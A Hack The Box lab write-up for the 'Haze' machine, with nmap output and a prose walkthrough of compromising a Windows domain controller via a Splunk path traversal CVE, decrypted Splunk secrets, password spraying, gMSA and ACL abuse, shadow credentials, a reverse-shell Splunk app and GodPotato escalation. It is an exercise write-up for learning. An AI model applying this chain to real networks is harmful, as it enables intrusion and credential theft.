HTB | Haze

Machine - https://app.hackthebox.com/machines/Haze

IP - 10.10.11.61

NMAP

└─$ nmap -sC -sV -p 53,88,135,139,445,464,593,636,3268,3269,5985,8000,8088,8089,47001,49664,49665,49666,49667,49668,57704,57708,57712,57756 10.10.11.61 -Pn
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-21 10:26 IST
Nmap scan report for haze.htb (10.10.11.61)
Host is up (0.59s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-21 12:56:11Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after:  2026-03-05T07:12:20
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after:  2026-03-05T07:12:20
|_ssl-date: TLS randomness does not represent time
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after:  2026-03-05T07:12:20
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8000/tcp  open  http          Splunkd httpd
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Splunkd
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://haze.htb:8000/en-US/account/login?return_to=%2Fen-US%2F
8088/tcp  open  ssl/http      Splunkd httpd
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2025-03-05T07:29:08
|_Not valid after:  2028-03-04T07:29:08
8089/tcp  open  ssl/http      Splunkd httpd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2025-03-05T07:29:08
|_Not valid after:  2028-03-04T07:29:08
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: splunkd
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
57704/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
57708/tcp open  msrpc         Microsoft Windows RPC
57712/tcp open  msrpc         Microsoft Windows RPC
57756/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-06-21T12:57:18
|_  start_date: N/A
|_clock-skew: 7h59m57s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.29 seconds

Port 53

Port 8000

Looks like a Splunk server, Let’s visit the site

Foothold/shell

Shell as edward.martin

CVE-2024-36991

Looking for a known vulnerability for Splunk we found CVE-2024-36991

In Splunk Enterprise on Windows versions below 9.2.2, 9.1.5, and 9.0.10, an attacker could perform a path traversal on the /modules/messaging/ endpoint in Splunk Enterprise on Windows. This vulnerability should only affect Splunk Enterprise on Windows.

Let’s try to look for some files

We found hashes for admin, edward, mark and paul

Let’s try to crack these via hashcat

it did not work

Let’s look for config files for Splunk (refer this)

Here we found bindDNpassword for Paul

Auth as Paul.Taylor

According to this discussion, we can crack the password if we can have splunk.secret

A simple Google search tells us the path $SPLUNK_HOME/etc/auth/splunk.secret, and we can curl that

found splunksecrets tool for working with Splunk secrets offline

And we now have Paul’s Cred

Let's see can we do smb or winrm via this

Since we can smb via paul’s cred, let’s enum shares and users

I will copy the sidtypeuser and print the names

Let’s password spray the password of paul and see if someone is reusing it or not

mark.adams is also using paul’s password

Auth as Mark.adams

I can winrm via mark

and we are in as Mark

Mark is a part of gMSA_Managers group

Bloodhound

Let’s use bloodhound-python

We can see MARK.ADMAS@HAZE.HTB -> MemberOf -> GMSA_MANAGERS@HAZE.HTB

A Group Managed Service Account (gMSA) is a special type of Active Directory (AD) account that administrators use to run automated services securely. Microsoft introduced it in Windows Server 2012 to solve the common problem of managing service account passwords. Unlike traditional service accounts, where administrators often set passwords manually and rarely update them, gMSAs allow Active Directory to manage passwords automatically. Reference: https://www.hackingarticles.in/readgmsapassword-attack/

GMSA_Managers

Currently, Mark does not have read permission

We can check who has the permission to view the password

Since Domain Admins can view the password, and Mark is not a domain admin, but mark is in the gMSA administrator group, so try to modify the readable user

Now we can retrieve the password of Haze-IT-Backup$

So the best practice is to try to update bloodhound content as soon as you get a user within the domain

Bloodhound via new hash

We can see HAZE-IT-BACKUP@HAZE.HTB -> WriteOwner -> SUPPORT_SERVICES@HAZE.HTB -> ForceChangePassword/ AddKeyCedentialLink -> EDWARD.MARTIN@HAZE.HTB

WriteOwner

Set HAZE-IT-BACKUP@HAZE.HTB as group owner of SUPPORT_SERVICES@HAZE.HTB

No we need to add HAZE-IT-BACKUP@HAZE.HTB to SUPPORT_SERVICES@HAZE.HTB, but before that, we need to add all permissions to ourselves

Now Haze-IT-Backup$ has full control over SUPPORT_SERVICES we can add ourselves to SUPPORT_SERVICES

Shadow Credentials

we will use https://github.com/ShutdownRepo/pywhisker.git for shadow credentials

Now let’s use https://github.com/dirkjanm/PKINITtools

Using this TGT, we can grab our NT hash:

Setting Environment Variables

now we winrm via cache file

and we have user.txt

Privilege Escalation

Shell as Alexander. Green

Extracting cred from Splunk auth

found a backup zip

We found authentication.conf file which contains bindDNpassword

We also found splunk.secret

Now we can decrypt

Let’s login as admin on the portal

Splunk rev shell

under “apps” → “Manage Apps” we can see there is an option to install apps via files

We will use this to get the shell, edit the run.ps1 to add our IP and port

after that zip the files and rename it

now we have to install the app and wait for shell

SeImpersonatePrivilege

we can see that Alexander has SeImpersonatePrivilege

I tried for printspooler64.exe but it not work

let’s try https://github.com/BeichenDream/GodPotato

Since we can get NT AUTHORITY\NETWORK SERVICE we can get the shell/ root.txt

PreviousHTB | ScepterNextHTB | TheFrizz

Last updated